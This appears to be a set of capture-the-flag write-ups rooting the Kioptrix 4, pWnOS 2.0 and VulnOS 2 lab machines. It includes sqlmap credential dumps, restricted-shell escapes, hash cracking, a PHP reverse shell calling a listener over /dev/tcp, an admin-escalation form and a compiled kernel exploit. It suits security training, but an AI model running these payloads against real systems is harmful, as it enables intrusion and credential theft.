web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.12
[11:46:01] [INFO] fetched data logged to text files under ‘/root/.sqlmap/output/192.168.79.217’

[*] ending @ 11:46:01 /2019-06-06/

qlmap got a 302 redirect to ‘http://192.168.79.217:80/login_success.php?username=erik’. Do you want to follow? [Y/n] n
1
[11:51:00] [INFO] retrieved: members
[11:51:00] [INFO] fetching columns for table ‘members’ in database ‘members’
[11:51:00] [INFO] retrieved: 3
[11:51:00] [INFO] retrieved: id
[11:51:01] [INFO] retrieved: username
[11:51:01] [INFO] retrieved: password
[11:51:01] [INFO] fetching entries for table ‘members’ in database ‘members’
[11:51:01] [INFO] fetching number of entries for table ‘members’ in database ‘members’
[11:51:01] [INFO] retrieved: 2
[11:51:02] [INFO] retrieved: 1
[11:51:02] [INFO] retrieved: MyNameIsJohn
[11:51:02] [INFO] retrieved: john
[11:51:03] [INFO] retrieved: 2
[11:51:03] [INFO] retrieved: ADGAdsafdfwt4gadfga==
[11:51:04] [INFO] retrieved: robert
Database: members
Table: members
[2 entries]
+—-+———-+———————–+
| id | username | password |
+—-+———-+———————–+
| 1 | john | MyNameIsJohn |
| 2 | robert | ADGAdsafdfwt4gadfga== |
+—-+———-+———————–+

I tried john and I can login but then nothing:

Same for Robert…

Trying ssh:

ssh john@192.168.79.217
The authenticity of host ‘192.168.79.217 (192.168.79.217)’ can’t be established.
RSA key fingerprint is SHA256:3fqlLtTAindnY7CGwxoXJ9M2rQF6nn35SFMTVv56lww.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added ‘192.168.79.217’ (RSA) to the list of known hosts.
john@192.168.79.217’s password:
Welcome to LigGoat Security Systems – We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you don’t screw up
Type ‘?’ or ‘help’ to get the list of allowed commands
john:~$

Bingo!

But both are very restricted. only a few commands available:

elcome to LigGoat Security Systems – We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you don’t screw up
Type ‘?’ or ‘help’ to get the list of allowed commands
robert:~$ cd /home/robert
robert:~$ ll
total 0
robert:~$ help
cd clear echo exit help ll lpath ls
robert:~$ lpath
Allowed:
/home/robert

Trying to create a file

robert:~$ echo “1”>1.txt
*** forbidden syntax -> “echo “1”>1.txt”
*** You have 0 warning(s) left, before getting kicked out.
This incident has been reported.

robert:~$ echo 1
1

robert:~$ echo <?php phpinfo()?>
*** forbidden syntax -> “echo <?php phpinfo()?>”
*** Kicked out

Looks like SMB password is the same:

root@kali:~/boxes/kioptrix# smbclient -U john //192.168.79.217/IPC$
Enter WORKGROUP\john’s password:
Try “help” to get a list of possible commands.
smb: \> help
? allinfo altname archive backup
blocksize cancel case_sensitive cd chmod
chown close del deltree dir
du echo exit get getfacl
geteas hardlink help history iosize
lcd link lock lowercase ls
l mask md mget mkdir
more mput newer notify open
posix posix_encrypt posix_open posix_mkdir posix_rmdir
posix_unlink posix_whoami print prompt put
pwd q queue quit readlink
rd recurse reget rename reput
rm rmdir showacls setea setmode
scopy stat symlink tar tarmode
timeout translate unlock volume vuid
wdel logon listconnect showconnect tcon
tdis tid utimes logoff ..
!

but then nothing…

Trying the printer:

smbclient -U robert //192.168.79.217/print$
Enter WORKGROUP\robert’s password:
Try “help” to get a list of possible commands.
smb: \> dir
. D 0 Sat Feb 4 10:57:48 2012
.. D 0 Sat Feb 4 11:16:24 2012
W32X86 D 0 Mon Mar 9 07:25:45 2009
WIN40 D 0 Mon Mar 9 07:25:45 2009

4916892 blocks of size 1024. 3581296 blocks available

Went back to lshell…
Found a way to escalate:

ssh john@192.168.79.217
john@192.168.79.217’s password:
Welcome to LigGoat Security Systems – We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you don’t screw up
Type ‘?’ or ‘help’ to get the list of allowed commands
john:~$ echo os.system(‘/bin/bash’)

john@Kioptrix4:~$ ll
bash: ll: command not found
john@Kioptrix4:~$ alias ll=”ls -al”
john@Kioptrix4:~$ ll
total 28
drwxr-xr-x 2 john john 4096 2012-02-04 18:39 .
drwxr-xr-x 5 root root 4096 2012-02-04 18:05
..
-rw——- 1 john john 61 2012-02-04 23:31 .bash_history
-rw-r–r– 1 john john 220 2012-02-04 18:04 .bash_logout
-rw-r–r– 1 john john 2940 2012-02-04 18:04 .bashrc
-rw-r–r– 1 john john 312 2019-06-06 08:46 .lhistory
-rw-r–r– 1 john john 586 2012-02-04 18:04 .profile


Weird…. The flag is readable by everyone:
cd /root
john@Kioptrix4:/root$ ll
total 44
drwxr-xr-x 4 root root 4096 2012-02-06 18:46 .
drwxr-xr-x 21 root root 4096 2012-02-06 18:41
..
-rw——- 1 root root 59 2012-02-06 20:24 .bash_history
-rw-r–r– 1 root root 2227 2007-10-20 07:51 .bashrc
-rw-r–r– 1 root root 625 2012-02-06 10:48 congrats.txt
-rw-r–r– 1 root root 1 2012-02-05 10:38 .lhistory
drwxr-xr-x 8 loneferret loneferret 4096 2012-02-04 17:01
lshell-0.9.12
-rw——- 1 root root 1 2012-02-05 10:38 .mysql_history
-rw——- 1 root root 5 2012-02-06 18:38 .nano_history
-rw-r–r– 1 root root 141 2007-10-20 07:51 .profile
drwx—— 2 root root 4096 2012-02-06 11:43
.ssh
john@Kioptrix4:/root$ cat congrats.txt


Congratulations!
You’ve got root.

There is more then one way to get root on this system. Try and find them.
I’ve only tested two (2) methods, but it doesn’t mean there aren’t more.
As always there’s an easy way, and a not so easy way to pop this box.
Look for other methods to get root privileges other than running an exploit.

It took a while to make this. For one it’s not as easy as it may look, and
also work and family life are my priorities. Hobbies are low on my list.
Really hope you enjoyed this one.

If you haven’t already, check out the other VMs available on:
www.kioptrix.com

Thanks for playing,

——————————–
So still searching!

Mysql is running as root:

mysql> select sys_exec(‘id > /tmp/out; chown john.john /tmp/out’);
+—————————————————–+
| sys_exec(‘id > /tmp/out; chown john.john /tmp/out’) |
+—————————————————–+
| NULL |
+—————————————————–+
1 row in set (0.02 sec)

mysql> \! sh
$ cat /tmp/out
uid=0(root) gid=0(root)

$ cd /root
$ ls
congrats.txt lshell-0.9.12
$ cat congrats.txt
Congratulations!
You’ve got root.

There is more then one way to get root on this system. Try and find them.
I’ve only tested two (2) methods, but it doesn’t mean there aren’t more.
As always there’s an easy way, and a not so easy way to pop this box.
Look for other methods to get root privileges other than running an exploit.

It took a while to make this. For one it’s not as easy as it may look, and
also work and family life are my priorities. Hobbies are low on my list.
Really hope you enjoyed this one.

If you haven’t already, check out the other VMs available on:
www.kioptrix.com

Thanks for playing,
loneferret

pWnOS: 2.0

nmap -Pn -T4 10.10.10.1/24
Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-06-04 15:24 ADT
Nmap scan report for 10.10.10.100
Host is up (0.00044s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 94:65:9C:41:A0:D7 (Intel Corporate)

Starting gobuster:
gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.100 > /root/boxes
/pwnos/reco.txt
2019/06/04 15:29:28 Starting gobuster
2019/06/04 15:30:30 Finished

=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://10.10.10.100/
[+] Threads : 10
[+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout : 10s
=====================================================
=====================================================
/index (Status: 200)
/login (Status: 200)
/register (Status: 200)
/info (Status: 200)
/blog (Status: 301)
/includes (Status: 301)
/activate (Status: 302)
/server-status (Status: 403)
=====================================================

So going to the website:

Then Register:

Activate account:

And login:

Then nothing happens!

Not much for now.

Checking the blog directory:

In the source I see
<meta name=”generator” content=”Simple PHP Blog 0.4.0″ />

Searching for exploit:
Simple PHP Blog 0.4 – ‘colors.php’ Multiple Cross-Site Scripting Vulnerabilities | exploits/cgi/webapps/26463.txt
Simple PHP Blog 0.4 – ‘preview_cgi.php’ Multiple Cross-Site Scripting Vulnerabilities | exploits/cgi/webapps/26461.txt
Simple PHP Blog 0.4 – ‘preview_static_cgi.php’ Multiple Cross-Site Scripting Vulnerabiliti | exploits/cgi/webapps/26462.txt
Simple PHP Blog 0.4.0 – Multiple Remote s | exploits/php/webapps/1191.pl
Simple PHP Blog 0.4.0 – Remote Command Execution (Metasploit) | exploits/php/webapps/16883.rb
Simple PHP Blog 0.4.7.1 – Remote Command Execution | exploits/php/webapps/1581.pl


The exploit 1191.pl is interesting. I can shows login/password hash:

I found $1$5uKltrG3$Q59M4eQKIqLC7JBA4rLHK/

Trying to identify the format:

/usr/share/exploitdb# hashid ‘$1$5uKltrG3$Q59M4eQKIqLC7JBA4rLHK/

Analyzing ‘$1$weWj5iAZ$NU4CkeZ9jNtcP/qrPC69a/’
[+] MD5 Crypt
[+] Cisco-IOS(MD5)
[+] FreeBSD MD5

Then using hashcat:
hashcat -m 500 –force -a 0 -o craked hash /usr/share/wordlists/rockyou.txt

Session……….: hashcat
Status………..: Cracked
Hash.Type……..: md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5)
Hash.Target……: $1$5uKltrG3$Q59M4eQKIqLC7JBA4rLHK/
Time.Started…..: Wed Jun 5 12:50:27 2019 (26 secs)
Time.Estimated…: Wed Jun 5 12:50:53 2019 (0 secs)
Guess.Base…….: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue……: 1/1 (100.00%)
Speed.#1………: 4376 H/s (8.03ms) @ Accel:128 Loops:62 Thr:1 Vec:8
Recovered……..: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress………: 112640/14344385 (0.79%)
Rejected………: 0/112640 (0.00%)
Restore.Point….: 112128/14344385 (0.78%)
Restore.Sub.#1…: Salt:0 Amplifier:0-1 Iteration:992-1000
Candidates.#1….: ethan11 -> chambers1

In the meantime trying soomething else:

perl 1191.pl -h http://10.10.10.100/blog -e 3 -U erik -P erik

________________________________________________________________________________
SimplePHPBlog v0.4.0 Exploits
by
Kenneth F. Belva, CISSP
http://www.ftusecurity.com
________________________________________________________________________________
Running Set New Username and Password Exploit….


Deleted File: ./config/password.txt
./config/password.txt created!
Username is set to: erik
Password is set to: erik

I’m in!

Sent to upload an image and uploaded the following php:
<?php exec(“/bin/bash -c ‘bash -i >& /dev/tcp/10.10.10.10/443 0>&1′”);?>

It worked!

Then on kali:
nc -lnvp 443

Then on the broswer, I went to http://10.10.10.100/blog/images/reverse.php

Bingo!

nc -lnvp 443
listening on [any] 443 …
connect to [10.10.10.10] from (UNKNOWN) [10.10.10.100] 36116
bash: no job control in this shell
www-data@web:/var/www/blog/images$

Upgrade to a proper shell:

python -c 'import pty; pty.spawn("/bin/bash")'

CTRL Z
stty raw -echo
fg and two times ENTER

export TERM=screen
reset

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Now trying to escalate:
uname -a
Linux web 2.6.38-8-server #42-Ubuntu SMP Mon Apr 11 03:49:04 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux

Nothing in sudoers et suid

Tried different exploits.. nothing

Checking mysql as the password is in mysqli_connect.php

// Set the database access information as constants:

DEFINE (‘DB_USER’, ‘root’);
DEFINE (‘DB_PASSWORD’, ‘root@ISIntS’);
DEFINE (‘DB_HOST’, ‘localhost’);
DEFINE (‘DB_NAME’, ‘ch16’);

mysql -u root -p

Then select do_system(‘id > tmp/out; chown www-data.www-data /tmp/out’);

Didn’t work…. Missing UDF..

Tried to login as root using the same password:

BINGO!

/home$ su –
Password:
root@web:~# id
uid=0(root) gid=0(root) groups=0(root)
root@web:~# cd /root
root@web:~# ll
total 32
drwx—— 4 root root 4096 2011-05-09 19:25 ./
drwxr-xr-x 21 root root 4096 2011-05-07 13:37
../
drwx—— 2 root root 4096 2011-05-07 15:12
.aptitude/
-rw-r–r– 1 root root 107 2011-05-09 19:29 .bash_history
-rw-r–r– 1 root root 3106 2010-10-21 08:47 .bashrc
drwx—— 2 root root 4096 2011-05-07 17:18
.cache/
-rw-r–r– 1 root root 0 2011-05-09 19:24 .mysql_history
-rw-r–r– 1 root root 140 2010-10-21 08:47 .profile
-rw——- 1 root root 837 2011-05-09 19:16 .viminfo

Vuln os-2

Vulnos is on 192.168.57.5

Quick scan:

Nmap scan report for 192.168.57.5
Host is up (0.000093s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
6667/tcp open irc ngircd
MAC Address: 08:00:27:16:B1:0E (Oracle VirtualBox virtual NIC)
Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel

I checked the website:

If I follow the link I have an ecomerce website:

Not much there for now.
Checking robots.txt …. Found a lot of things:

#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites like Yahoo!
# and Google. By telling these “robots” where not to go on your site,
# you save bandwidth and server resources.
#
# This file will be ignored unless it is at the root of your host:
# Used: http://example.com/robots.txt
# Ignored: http://example.com/site/robots.txt
#
# For more information about the robots.txt standard, see:
# http://www.robotstxt.org/wc/robots.html
#
# For syntax checking, see:
# http://www.sxw.org.uk/computing/robots/check.html

User-agent: *
Crawl-delay: 10
# Directories
Disallow: /includes/
Disallow: /misc/
Disallow: /modules/
Disallow: /profiles/
Disallow: /scripts/
Disallow: /themes/
# Files
Disallow: /CHANGELOG.txt
Disallow: /cron.php
Disallow: /INSTALL.mysql.txt
Disallow: /INSTALL.pgsql.txt
Disallow: /INSTALL.sqlite.txt
Disallow: /install.php
Disallow: /INSTALL.txt
Disallow: /LICENSE.txt
Disallow: /MAINTAINERS.txt
Disallow: /update.php
Disallow: /UPGRADE.txt
Disallow: /xmlrpc.php
# Paths (clean URLs)
Disallow: /admin/
Disallow: /comment/reply/
Disallow: /filter/tips/
Disallow: /node/add/
Disallow: /search/
Disallow: /user/register/
Disallow: /user/password/
Disallow: /user/login/
Disallow: /user/logout/
# Paths (no clean URLs)
Disallow: /?q=admin/
Disallow: /?q=comment/reply/
Disallow: /?q=filter/tips/
Disallow: /?q=node/add/
Disallow: /?q=search/
Disallow: /?q=user/password/
Disallow: /?q=user/register/
Disallow: /?q=user/login/
Disallow: /?q=user/logout/

However some files/folders are not accesible (Clean urls) or restricted:

The source of the page indicates that it is running drupal 7:
<meta name=”Generator” content=”Drupal 7 (http://drupal.org)” />

Let’s try gobuster

gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.57.5/jabc

=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://192.168.57.5/jabc/
[+] Threads : 10
[+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout : 10s
=====================================================
2019/05/29 11:35:56 Starting gobuster
=====================================================
/templates (Status: 301)
/misc (Status: 301)
/themes (Status: 301)
/modules (Status: 301)
/scripts (Status: 301)
/sites (Status: 301)
/includes (Status: 301)
/profiles (Status: 301)
=====================================================
2019/05/29 11:37:15 Finished
=====================================================

and

gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.57.5

=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://192.168.57.5/
[+] Threads : 10
[+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout : 10s
=====================================================
2019/05/29 11:36:06 Starting gobuster
=====================================================
/javascript (Status: 301)
/server-status (Status: 403)
=====================================================
2019/05/29 11:37:27 Finished

Nothing there!

I went back to jabc and found this:

But when I try to access it, I receive an empty response.

Tried the login page and sent it to Burp:

POST /jabc/?q=user/login/ HTTP/1.1
Host: 192.168.57.5
User-Agent: Mozilla/4.0 (compatible; Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.13) Gecko/20060414; Windows NT 5.1)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.57.5/jabc/?q=user/login/
Content-Type: application/x-www-form-urlencoded
Content-Length: 115
Cookie: has_js=1; SESS44909b7d2458c4a03ee24e5944921617=EQ2aVhZRa0Mnu0vb1oHH_8bDB3b69zYURxi9ZFaityc
Connection: close
Upgrade-Insecure-Requests: 1

name=erik&pass=ckp9rvq2&form_build_id=form-7E_t5yiux-kbs2Li3AdGhr4BVtJnimp9ocIZl2XPavw&form_id=user_login&op=Log+in

Then tried wfuzz:
wfuzz -w /usr/share/wordlists/wfuzz/general/common.txt –hc 186 -d “name=admin&pass=FUZZ&form_build_id=form-7E_t5yiux-kbs2Li3AdGhr4BVtJnimp9ocIZl2XPavw&form_id=user_login&op=Log+in” http://192.168.57.5/jabc/ > /root/boxes/VulnOS2/fuzz.txt

Nothing

Went back to the webpage and check Documentation.
In the page source, there is a new url and login / password as guest:
<p><span style=”color:#000000″>For a detailed view and documentation of our products, please visit our documentation platform at /jabcd0cs/ on the server. Just login with guest/guest</span></p>

I did login as guest.
Then search exploit:

2) Improper Access Control in OpenDocMan: CVE-2014-1946

The vulnerability exists due to insufficient validation of allowed action in “/signup.php” script when updating userâ??s profile. A
remote authenticated attacker can assign administrative privileges to the current account and gain complete control over the applica
tion.

The exploitation example below assigns administrative privileges for the current account:

<form action=”http://[host]/signup.php” method=”post” name=”main”>
<input type=”hidden” name=”updateuser” value=”1″>
<input type=”hidden” name=”admin” value=”1″>
<input type=”hidden” name=”id” value=”[USER_ID]”>
<input type=”submit” name=”login” value=”Run”>
</form>

Modified guest to be admin. But still not enough privilegies.
I tried to upload a php script but it is refused due to mime type control.
I however can modify the webmin user password.

Bingo! Admin!

(Login webmin, password admin)

I uploaded my reverse shell php code:

<?php
exec(“/bin/bash -c ‘bash -i >& /dev/tcp/192.168.1.124/443 0>&1′”);
?>

and run nc -lvnp 443 on my kali

But still cannot have to php to be executed.

Check the settings and found the dataDir.

But files are stored with a .dat extension… So still cannot execute php

I tried to upload it as reverse.php.png

But still cannot execute it.

/var/www/html/jabcd0cs/uploads/

Searching for vulenrabilities:
OpenDocMan 1.3.4 – ‘search.php where’ SQL Injection | exploits/php/webapps/46500.txt

Trying sqlmap to enumerate webmin password:

sqlmap –url “http://192.168.56.104//jabcd0cs/ajax_udf.php?q=1$add_value=odm_user” -p add_value –dbs

Then fiding the user table and finally grab the password hash for webmin

Once the hash decoded: webmin1980

The ssh into the box:

ssh webmin@192.168.56.104
webmin@192.168.56.104’s password:
Welcome to Ubuntu 14.04.4 LTS (GNU/Linux 3.13.0-24-generic i686)

* Documentation: https://help.ubuntu.com/

System information as of Tue Jun 4 15:20:49 CEST 2019

System load: 0.0 Processes: 84
Usage of /: 5.8% of 29.91GB Users logged in: 0
Memory usage: 12% IP address for eth0: 192.168.56.104
Swap usage: 0%

Graph this data and manage this system at:
https://landscape.canonical.com/

Last login: Tue Jun 4 15:20:49 2019 from 192.168.56.1

Getting a proper shell:

python -c 'import pty; pty.spawn("/bin/bash")'

Then checking os version:

lsb_release -a

No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 14.04.4 LTS
Release: 14.04
Codename: trusty

searchsploit:
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) – ‘overlayfs’ Local Privilege | exploits/linux/local/37292.c

Compile the code and execute:

webmin@VulnOSv2:/var/www/html/jabcd0cs/uploads$ gcc -o test test.c
webmin@VulnOSv2:/var/www/html/jabcd0cs/uploads$ ./test
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),1001(webmin)

cd /root

# alias ll=”ls -al”
# ll
total 36
drwx—— 3 root root 4096 May 4 2016 .
drwxr-xr-x 21 root root 4096 Apr 3 2016 ..
-rw——- 1 root root 9 May 4 2016 .bash_history
-rw-r–r– 1 root root 3106 Feb 20 2014 .bashrc
drwx—— 2 root root 4096 May 2 2016 .cache
-rw-r–r– 1 root root 140 Feb 20 2014 .profile
-rw——- 1 root root 3 May 2 2016 .psql_history
-rw——- 1 root root 735 May 4 2016 .viminfo
-rw-r–r– 1 root root 165 May 4 2016 flag.txt
# cat flag.txt
Hello and welcome.
You successfully compromised the company “JABC” and the server completely !!
Congratulations !!!
Hope you enjoyed it.

What do you think of A.I.?